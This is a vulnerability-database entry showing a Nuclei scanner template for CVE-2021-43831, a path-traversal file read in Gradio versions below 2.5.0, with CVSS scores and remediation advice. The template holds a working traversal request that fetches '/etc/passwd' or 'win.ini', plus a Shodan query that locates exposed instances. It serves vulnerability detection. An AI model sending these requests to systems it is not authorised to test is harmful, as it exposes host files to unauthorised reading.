Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-43831
HistoryJun 15, 2024 - 12:43 p.m.

Gradio < 2.5.0 - Arbitrary File Read

2024-06-1512:43:59
ProjectDiscovery
github.com
33
cve
cve2021
lfi
gradio
arbitrary file read
file access
update.

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:N/A:N

CVSS3

7.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

AI Score

6.7

Confidence

Low

EPSS

0.006

Percentile

79.0%

Files on the host computer can be accessed from the Gradio interface
id: CVE-2021-43831

info:
  name: Gradio < 2.5.0 - Arbitrary File Read
  author: isacaya
  severity: high
  description: |
    Files on the host computer can be accessed from the Gradio interface
  impact: |
    An attacker would be able to view the contents of a file on the computer.
  remediation: |
    Update to version 2.5.0.
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
    - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2021-43831
    cwe-id: CWE-22
    epss-score: 0.00063
    epss-percentile: 0.26511
    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
  metadata:
    vendor: gradio_project
    product: gradio
    framework: python
    shodan-query: title:"Gradio"
  tags: cve,cve2021,lfi,gradio

http:
  - method: GET
    path:
      - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"

    payloads:
      path:
        - /etc/passwd
        - /windows/win.ini

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:N/A:N

CVSS3

7.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

AI Score

6.7

Confidence

Low

EPSS

0.006

Percentile

79.0%

Related for NUCLEI:CVE-2021-43831